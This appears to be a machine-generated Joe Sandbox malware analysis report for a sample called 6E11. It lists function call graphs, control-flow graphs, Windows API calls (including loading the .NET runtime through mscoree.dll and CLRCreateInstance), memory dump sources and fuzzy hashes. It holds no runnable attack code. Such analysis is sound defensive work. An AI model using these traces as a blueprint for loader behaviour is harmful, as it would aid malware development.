6f0d8756 43478 6f10ac75 RaiseException 43459->43478 43462 6f109d66 _malloc 66 API calls 43461->43462 43465 6f0d8d8f 43462->43465 43463 6f0d8dbb 43463->43447 43464 6f1091f6 70 API calls 43464->43465 43465->43463 43465->43464 43466 6f0d8dc1 std::exception::exception 43465->43466 43469 6f109d66 _malloc 66 API calls 43465->43469 43470 6f10ac75 RaiseException 43466->43470 43468 6f0d8df0 43469->43465 43470->43468 43472 6f109bb5 77 API calls 43471->43472 43473 6f0a4fcf 43472->43473 43475 6f0a4ff1 43473->43475 43476 6f0a5050 81 API calls _memcpy_s 43473->43476 43475->43452 43476->43475 43477->43459 43478->43454 43479->43433 43480 1560848 43481 1560864 43480->43481 43487 1560898 43481->43487 43490 15612a8 43481->43490 43494 1561231 43481->43494 43498 1561240 43481->43498 43502 1563352 43481->43502 43506 15612e5 43481->43506 43510 1561356 43481->43510 43514 1561309 43481->43514 43491 156128d 43490->43491 43492 15631ab 43491->43492 43518 1569ab0 43491->43518 43492->43487 43495 1561240 43494->43495 43496 15631ab 43495->43496 43497 1569ab0 338 API calls 43495->43497 43496->43487 43497->43495 43499 1561273 43498->43499 43500 15631ab 43499->43500 43501 1569ab0 338 API calls 43499->43501 43500->43487 43501->43499 43503 156128d 43502->43503 43504 15631ab 43503->43504 43505 1569ab0 338 API calls 43503->43505 43504->43487 43505->43503 43507 156128d 43506->43507 43508 15631ab 43507->43508 43509 1569ab0 338 API calls 43507->43509 43508->43487 43509->43507 43511 156128d 43510->43511 43511->43510 43512 15631ab 43511->43512 43513 1569ab0 338 API calls 43511->43513 43512->43487 43513->43511 43515 156128d 43514->43515 43516 15631ab 43515->43516 43517 1569ab0 338 API calls 43515->43517 43516->43487 43517->43515 43522 1569ae8 43518->43522 43526 1569ad9 43518->43526 43519 1569ace 43519->43491 43523 1569af9 43522->43523 43524 1569aff 43523->43524 43530 1569b70 43523->43530 43524->43519 43527 1569ae8 43526->43527 43528 1569aff 43527->43528 43529 1569b70 338 API calls 43527->43529 43528->43519 43529->43528 43531 1569b9c 43530->43531 43535 1569c18 43531->43535 43542 1569c28 43531->43542 43532 1569bf6 43532->43524 43537 1569c28 43535->43537 43536 1569c39 43536->43532 43537->43536 43538 1569c28 338 API calls 43537->43538 43539 1569df4 43538->43539 43540 1569e12 43539->43540 43541 156a469 338 API calls 43539->43541 43540->43532 43541->43540 43544 1569c39 43542->43544 43545 1569cb9 43542->43545 43543 1569d4b 43543->43532 43544->43532 43545->43543 43546 1569c28 338 API calls 43545->43546 43547 1569df4 43546->43547 43548 1569e12 43547->43548 43549 156a469 338 API calls 43547->43549 43548->43532 43549->43548

                                                                      Executed Functions

                                                                      Function 6F0CB6B0 Relevance: 35.2, APIs: 23, Instructions: 669COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 6f0cb6b0-6f0cb758 VariantInit * 2 1 6f0cb75a-6f0cb75f call 6f11c1e0 0->1 2 6f0cb764-6f0cb769 0->2 1->2 4 6f0cb76b-6f0cb770 2->4 5 6f0cb773-6f0cb784 2->5 4->5 7 6f0cb78a-6f0cb791 5->7 8 6f0cbe96-6f0cbeb4 VariantClear * 2 5->8 11 6f0cb7b9-6f0cb7e2 SafeArrayCreateVector 7->11 12 6f0cb793-6f0cb798 7->12 9 6f0cbebe-6f0cbeca 8->9 10 6f0cbeb6-6f0cbebb 8->10 15 6f0cbecc-6f0cbed1 9->15 16 6f0cbed4-6f0cbef2 call 6f10948b 9->16 10->9 13 6f0cb7ec-6f0cb809 SafeArrayPutElement VariantClear 11->13 14 6f0cb7e4-6f0cb7e7 11->14 17 6f0cb79a-6f0cb79f 12->17 18 6f0cb7a2-6f0cb7b3 12->18 20 6f0cb80f-6f0cb81d 13->20 21 6f0cbe85-6f0cbe8d 13->21 14->13 15->16 17->18 18->8 18->11 24 6f0cb81f-6f0cb824 call 6f11c1e0 20->24 25 6f0cb829-6f0cb841 20->25 21->8 26 6f0cbe8f-6f0cbe90 SafeArrayDestroy 21->26 24->25 25->21 29 6f0cb847-6f0cb853 25->29 26->8 29->21 30 6f0cb859-6f0cb85e 29->30 30->21 31 6f0cb864-6f0cb86b 30->31 32 6f0cb871-6f0cb87e 31->32 33 6f0cb913-6f0cb917 31->33 36 6f0cb888-6f0cb8ea call 6f0cdbc0 call 6f0c5790 call 6f0cc850 32->36 37 6f0cb880-6f0cb882 32->37 34 6f0cb919-6f0cb91b 33->34 35 6f0cb921-6f0cb941 call 6f0bdcd0 33->35 34->21 34->35 35->21 42 6f0cb947-6f0cb964 call 6f0bdcd0 35->42 49 6f0cb8ef-6f0cb8f8 36->49 37->21 37->36 42->21 48 6f0cb96a-6f0cb96d 42->48 50 6f0cb96f-6f0cb98d call 6f0bdcd0 48->50 51 6f0cb993-6f0cb9bf 48->51 52 6f0cb8fa-6f0cb8ff call 6f0ce800 49->52 53 6f0cb904-6f0cb90e call 6f0ce800 49->53 50->21 50->51 56 6f0cb9cb-6f0cba1d VariantClear 51->56 57 6f0cb9c1-6f0cb9c6 call 6f11c1e0 51->57 64 6f0cbe83 52->64 53->51 56->21 65 6f0cba23-6f0cba31 56->65 57->56 64->21 66 6f0cba3d-6f0cba8b 65->66 67 6f0cba33-6f0cba38 call 6f11c1e0 65->67 66->21 70 6f0cba91-6f0cba95 66->70 67->66 70->21 71 6f0cba9b-6f0cbaa7 call 6f109bb5 70->71 74 6f0cbaa9-6f0cbab4 71->74 75 6f0cbab6 71->75 76 6f0cbab8-6f0cbacc call 6f0cbf00 74->76 75->76 76->21 79 6f0cbad2-6f0cbada 76->79 80 6f0cbadc-6f0cbaed call 6f0c47d0 79->80 81 6f0cbaf3-6f0cbaf8 79->81 80->21 80->81 83 6f0cbafa-6f0cbb0b call 6f0c47d0 81->83 84 6f0cbb11-6f0cbb2e call 6f0c49b0 81->84 83->21 83->84 84->21 90 6f0cbb34-6f0cbb4b call 6f0ccd20 84->90 90->21 93 6f0cbb51-6f0cbb8e call 6f0c5790 call 6f0c4170 90->93 98 6f0cbb9a-6f0cbba8 call 6f0ce800 93->98 99 6f0cbb90-6f0cbb95 call 6f0ce800 93->99 104 6f0cbbae-6f0cbbc0 98->104 105 6f0cbca2 98->105 99->64 104->105 107 6f0cbbc6-6f0cbc5b call 6f0bc4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6f0cdb10 104->107 106 6f0cbca8-6f0cbcae 105->106 108 6f0cbd78-6f0cbdc8 106->108 109 6f0cbcb4-6f0cbcc6 106->109 119 6f0cbc60-6f0cbc75 107->119 108->64 120 6f0cbdce-6f0cbdd7 108->120 109->108 111 6f0cbccc-6f0cbd76 call 6f0bc4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6f0cdb10 VariantClear * 2 109->111 111->108 122 6f0cbc77-6f0cbc8d 119->122 123 6f0cbc90-6f0cbca0 VariantClear * 2 119->123 120->64 124 6f0cbddd-6f0cbde4 120->124 122->123 123->106 124->64 126 6f0cbdea-6f0cbe03 call 6f109bb5 124->126 130 6f0cbe05-6f0cbe10 call 6f0bc4a0 126->130 131 6f0cbe12 126->131 133 6f0cbe14-6f0cbe3c 130->133 131->133 135 6f0cbe3e-6f0cbe50 133->135 136 6f0cbe7f 133->136 135->136 137 6f0cbe52-6f0cbe65 call 6f109bb5 135->137 136->64 140 6f0cbe67-6f0cbe6f call 6f0bc4a0 137->140 141 6f0cbe71 137->141 143 6f0cbe73-6f0cbe7c 140->143 141->143 143->136
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CB73F
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CB748
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0CB7BE
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0CB7F5
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CB801
                                                                        • Part of subcall function 6F0CC850: VariantInit.OLEAUT32(?), ref: 6F0CC88F
                                                                        • Part of subcall function 6F0CC850: VariantInit.OLEAUT32(?), ref: 6F0CC895
                                                                        • Part of subcall function 6F0CC850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0CC8A0
                                                                        • Part of subcall function 6F0CC850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F0CC8D5
                                                                        • Part of subcall function 6F0CC850: VariantClear.OLEAUT32(?), ref: 6F0CC8E1
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CBA15
                                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 6F0CBE90
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CBEA3
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CBEA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                                                      • String ID:
                                                                      • API String ID: 2012514194-0
                                                                      • Opcode ID: a508ed0b17ae15922f1d2e64d42a8a8eaf7ee93dea01605c905831b7a887a026
                                                                      • Instruction ID: b0490e48d5ba2b853eca5de83f28dbef57113d83753b7f6a3bad211b313d66e6
                                                                      • Opcode Fuzzy Hash: a508ed0b17ae15922f1d2e64d42a8a8eaf7ee93dea01605c905831b7a887a026
                                                                      • Instruction Fuzzy Hash: CC525CB5900218DFDB10DFA8C884BDEBBF6BF49714F148199E909AB391DB30A945CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B0EB3 Relevance: 23.3, Strings: 18, Instructions: 800COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 211 61b0eb3-61b0ece 213 61b19bb-61b19bf 211->213 214 61b0ed4-61b0ee6 211->214 215 61b19d2-61b1a58 213->215 216 61b19c1-61b19cd 213->216 219 61b0ee8-61b0f0a 214->219 220 61b0f15-61b0f36 214->220 233 61b1a5a-61b1a66 215->233 234 61b1a82 215->234 218 61b1ee8-61b1ef5 216->218 225 61b0f3c-61b0f52 219->225 220->225 227 61b0f5e-61b1042 225->227 228 61b0f54-61b0f58 225->228 250 61b106c 227->250 251 61b1044-61b1050 227->251 228->213 228->227 236 61b1a68-61b1a6e 233->236 237 61b1a70-61b1a76 233->237 238 61b1a88-61b1acd 234->238 239 61b1a80 236->239 237->239 368 61b1ad0 call 61c52b8 238->368 369 61b1ad0 call 61c52b0 238->369 239->238 242 61b1ad2-61b1adf 244 61b1ae1 242->244 245 61b1ae5-61b1b0e 242->245 244->245 248 61b1c40-61b1c47 245->248 249 61b1b14-61b1b40 245->249 252 61b1d4f-61b1db0 248->252 253 61b1c4d-61b1d4c 248->253 262 61b1b42 249->262 263 61b1b47-61b1b82 249->263 256 61b1072-61b1124 250->256 254 61b105a-61b1060 251->254 255 61b1052-61b1058 251->255 252->218 253->252 258 61b106a 254->258 255->258 275 61b114e 256->275 276 61b1126-61b1132 256->276 258->256 262->263 263->248 280 61b1154-61b116f 275->280 277 61b113c-61b1142 276->277 278 61b1134-61b113a 276->278 281 61b114c 277->281 278->281 284 61b1199 280->284 285 61b1171-61b117d 280->285 281->280 288 61b119f-61b11bd 284->288 286 61b117f-61b1185 285->286 287 61b1187-61b118d 285->287 291 61b1197 286->291 287->291 294 61b12db-61b13bf 288->294 295 61b11c3-61b12c2 288->295 291->288 308 61b13e9 294->308 309 61b13c1-61b13cd 294->309 295->294 313 61b13ef-61b1444 308->313 311 61b13cf-61b13d5 309->311 312 61b13d7-61b13dd 309->312 315 61b13e7 311->315 312->315 320 61b144a-61b1549 313->320 321 61b1562-61b1638 313->321 315->313 320->321 321->213 329 61b163e-61b1647 321->329 331 61b1649-61b164c 329->331 332 61b1652-61b1752 329->332 331->332 334 61b176a-61b1781 331->334 332->334 334->213 339 61b1787-61b1898 334->339 356 61b189a-61b189d 339->356 357 61b18a3-61b19a2 339->357 356->213 356->357 357->213 368->242 369->242
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<{q$p<{q$p<{q$p<{q
                                                                      • API String ID: 0-1111880270
                                                                      • Opcode ID: 1684a8b5646119c50d68bc706260e192fd99befe5df9028bf4796b9161125adb
                                                                      • Instruction ID: 879800e5451d55780485c0cff553ae1c4849d7c53d3c3164095210bcb5837cfb
                                                                      • Opcode Fuzzy Hash: 1684a8b5646119c50d68bc706260e192fd99befe5df9028bf4796b9161125adb
                                                                      • Instruction Fuzzy Hash: 0E82B474E002298FDBA8DF68C995BD9BBB1BB48310F1585E9D50DAB361DB309E81CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BB6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1876 6f0bb6c0-6f0bb715 GetModuleHandleW 1877 6f0bb72a-6f0bb738 GetProcAddress 1876->1877 1878 6f0bb717-6f0bb724 LoadLibraryW 1876->1878 1879 6f0bb94c-6f0bb954 1877->1879 1880 6f0bb73e-6f0bb750 1877->1880 1878->1877 1878->1879 1881 6f0bb95e-6f0bb96a 1879->1881 1882 6f0bb956-6f0bb95b 1879->1882 1880->1879 1887 6f0bb756-6f0bb771 1880->1887 1884 6f0bb96c-6f0bb971 1881->1884 1885 6f0bb974-6f0bb98f call 6f10948b 1881->1885 1882->1881 1884->1885 1887->1879 1890 6f0bb777-6f0bb788 1887->1890 1890->1879 1892 6f0bb78e-6f0bb791 1890->1892 1892->1879 1893 6f0bb797-6f0bb7b2 1892->1893 1893->1879 1895 6f0bb7b8-6f0bb7c5 1893->1895 1895->1879 1897 6f0bb7cb-6f0bb7d0 1895->1897 1898 6f0bb7da-6f0bb7e7 1897->1898 1899 6f0bb7d2-6f0bb7d7 1897->1899 1900 6f0bb7ec-6f0bb7ee 1898->1900 1899->1898 1900->1879 1901 6f0bb7f4-6f0bb7f9 1900->1901 1902 6f0bb7fb-6f0bb800 call 6f11c1e0 1901->1902 1903 6f0bb805-6f0bb80a 1901->1903 1902->1903 1905 6f0bb80c-6f0bb811 1903->1905 1906 6f0bb814-6f0bb829 1903->1906 1905->1906 1906->1879 1908 6f0bb82f-6f0bb849 1906->1908 1909 6f0bb850-6f0bb85b 1908->1909 1909->1909 1910 6f0bb85d-6f0bb8a4 call 6f10a116 GetModuleHandleW 1909->1910 1910->1879 1913 6f0bb8aa-6f0bb8c1 1910->1913 1914 6f0bb8c5-6f0bb8d0 1913->1914 1914->1914 1915 6f0bb8d2-6f0bb8f0 GetProcAddress 1914->1915 1915->1879 1916 6f0bb8f2-6f0bb8ff call 6f0a5340 1915->1916 1920 6f0bb900-6f0bb905 1916->1920 1920->1920 1921 6f0bb907-6f0bb90d 1920->1921 1921->1920 1922 6f0bb90f-6f0bb912 1921->1922 1923 6f0bb93a 1922->1923 1924 6f0bb914-6f0bb929 1922->1924 1927 6f0bb93d-6f0bb948 call 6f0bad80 1923->1927 1925 6f0bb92b-6f0bb92e 1924->1925 1926 6f0bb931-6f0bb938 1924->1926 1925->1926 1926->1927 1927->1879
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(mscoree.dll,F3D820D6), ref: 6F0BB711
                                                                      • LoadLibraryW.KERNEL32(mscoree.dll), ref: 6F0BB71C
                                                                      • GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6F0BB730
                                                                      • __cftoe.LIBCMT ref: 6F0BB870
                                                                      • GetModuleHandleW.KERNEL32(?), ref: 6F0BB88B
                                                                      • GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6F0BB8D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc$LibraryLoad__cftoe
                                                                      • String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
                                                                      • API String ID: 1275574042-506955582
                                                                      • Opcode ID: fb6a38d97dbe3654c0b1050e0d5d67478960ca1d94bc61c44465bdb808e8c31e
                                                                      • Instruction ID: 9fde786e3b7f712fbf93e13d8e99b4ac2665be2307a1d3db95b2c2cd9b807926
                                                                      • Opcode Fuzzy Hash: fb6a38d97dbe3654c0b1050e0d5d67478960ca1d94bc61c44465bdb808e8c31e
                                                                      • Instruction Fuzzy Hash: 139168B1D0424A9FDB04DFE8C8C4AAEBBF4FF48310B10866DE529EB250D731A946CB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061B2840 Relevance: 1.8, Strings: 1, Instructions: 576COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049595696.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61b0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (
                                                                      • API String ID: 0-3887548279
                                                                      • Opcode ID: d10f9afc440873ec4dc5faca8f19e283a4766bc01d0612515014511473837777
                                                                      • Instruction ID: 60ae65c823e4fdf6289fdd445a227c1324b3cdadac96efd74b2087f4944b321a
                                                                      • Opcode Fuzzy Hash: d10f9afc440873ec4dc5faca8f19e283a4766bc01d0612515014511473837777
                                                                      • Instruction Fuzzy Hash: 4652D274D012298FDB68DF65C894BEDBBB2BF89304F1481E9D409AB291DB356E85CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0156C8A8 Relevance: .1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1048355079.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1560000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1ffd7a029100629d5f4b66ee116dbee56f41d71247ba9a809decd1bcc7a045e7
                                                                      • Instruction ID: 8da62b45703557a6971e925f9d1fdfc856a0a3722eee19438fd04545035a6419
                                                                      • Opcode Fuzzy Hash: 1ffd7a029100629d5f4b66ee116dbee56f41d71247ba9a809decd1bcc7a045e7
                                                                      • Instruction Fuzzy Hash: CB31D1B5D01208AFDB05CFA8D850AEEFBB1BF49310F10906AE915B7360DB309A04CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0156C8B0 Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1048355079.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1560000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e2943a8ee26ef940a526ca7647cb47d6f8efed566d6df5ef17089823da460077
                                                                      • Instruction ID: 5543721c45b241024984e32a3ab959e9abc433d575bbc7bdaecfa73fe3d6d9d7
                                                                      • Opcode Fuzzy Hash: e2943a8ee26ef940a526ca7647cb47d6f8efed566d6df5ef17089823da460077
                                                                      • Instruction Fuzzy Hash: E331B275D01208AFDB04CFA8D850AEEFBB5FF49310F10906AE915B7360DB30AA04CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C2970 Relevance: 25.8, APIs: 17, Instructions: 335COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 145 6f0c2970-6f0c29c1 146 6f0c29cd-6f0c29dc 145->146 147 6f0c29c3-6f0c29c8 call 6f11c1e0 145->147 150 6f0c2d12-6f0c2d18 146->150 151 6f0c29e2-6f0c29e8 146->151 147->146 153 6f0c2d21-6f0c2d37 150->153 154 6f0c2d1a-6f0c2d1b SafeArrayDestroy 150->154 152 6f0c29ee-6f0c2a1a SafeArrayGetLBound SafeArrayGetUBound 151->152 151->153 152->150 155 6f0c2a20-6f0c2a37 SafeArrayGetElement 152->155 154->153 155->150 156 6f0c2a3d-6f0c2a4d 155->156 156->147 157 6f0c2a53-6f0c2a6f 156->157 159 6f0c2d5a-6f0c2d5f 157->159 160 6f0c2a75-6f0c2a77 157->160 162 6f0c2c76-6f0c2c78 159->162 160->159 161 6f0c2a7d-6f0c2a92 call 6f0c38e0 160->161 167 6f0c2c58-6f0c2c63 161->167 168 6f0c2a98-6f0c2aac 161->168 162->150 163 6f0c2c7e-6f0c2c86 162->163 163->150 169 6f0c2c6d-6f0c2c72 167->169 170 6f0c2c65-6f0c2c6a 167->170 171 6f0c2aae-6f0c2ab3 168->171 172 6f0c2ab6-6f0c2acc VariantInit 168->172 169->162 170->169 171->172 172->147 173 6f0c2ad2-6f0c2ae3 172->173 174 6f0c2ae9-6f0c2aeb 173->174 175 6f0c2ae5-6f0c2ae7 173->175 176 6f0c2aee-6f0c2af2 174->176 175->176 177 6f0c2af8 176->177 178 6f0c2af4-6f0c2af6 176->178 179 6f0c2afa-6f0c2b34 177->179 178->179 181 6f0c2b3a-6f0c2b50 VariantInit 179->181 182 6f0c2c8b-6f0c2caa VariantClear * 2 179->182 181->147 183 6f0c2b56-6f0c2b67 181->183 182->169 184 6f0c2cac-6f0c2cb4 182->184 185 6f0c2b6d-6f0c2b6f 183->185 186 6f0c2b69-6f0c2b6b 183->186 184->169 187 6f0c2b72-6f0c2b76 185->187 186->187 189 6f0c2b7c 187->189 190 6f0c2b78-6f0c2b7a 187->190 191 6f0c2b7e-6f0c2bb8 189->191 190->191 193 6f0c2bbe-6f0c2bcb 191->193 194 6f0c2d3a-6f0c2d55 VariantClear * 3 191->194 193->194 195 6f0c2bd1-6f0c2bec call 6f0d3160 193->195 194->167 198 6f0c2bf1-6f0c2bf3 195->198 199 6f0c2bf9-6f0c2c1f VariantClear * 3 198->199 200 6f0c2cb6-6f0c2cf1 VariantClear * 3 198->200 201 6f0c2c29-6f0c2c34 199->201 202 6f0c2c21-6f0c2c26 199->202 206 6f0c2cfb-6f0c2d06 200->206 207 6f0c2cf3-6f0c2cf6 200->207 204 6f0c2c3e-6f0c2c4d 201->204 205 6f0c2c36-6f0c2c3b 201->205 202->201 204->155 208 6f0c2c53 204->208 205->204 209 6f0c2d08-6f0c2d0d 206->209 210 6f0c2d10 206->210 207->206 208->150 209->210 210->150
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F0C29F6
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0C2A08
                                                                      • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F0C2A2F
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C2ABB
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C2B3F
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C2C04
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C2C0B
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C2C12
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C2C96
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C2C9D
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C2CD6
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C2CDD
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C2CE4
                                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 6F0C2D1B
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C2D45
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C2D4C
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C2D53
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
                                                                      • String ID:
                                                                      • API String ID: 214056513-0
                                                                      • Opcode ID: d4aeef9ced3f4074cbfd57cf83e7a934e992e2e1be54c633834d2fe2213b3f5e
                                                                      • Instruction ID: 43da6ca575d3e582e973e7b12a2cc78c78417c12ee13b791633900f87494e228
                                                                      • Opcode Fuzzy Hash: d4aeef9ced3f4074cbfd57cf83e7a934e992e2e1be54c633834d2fe2213b3f5e
                                                                      • Instruction Fuzzy Hash: FEC155716083419FD700CFA8C8C4A5EBBE9FF99304F60895DF6A5CB261C675E845CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BAF30 Relevance: 22.8, APIs: 15, Instructions: 335COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
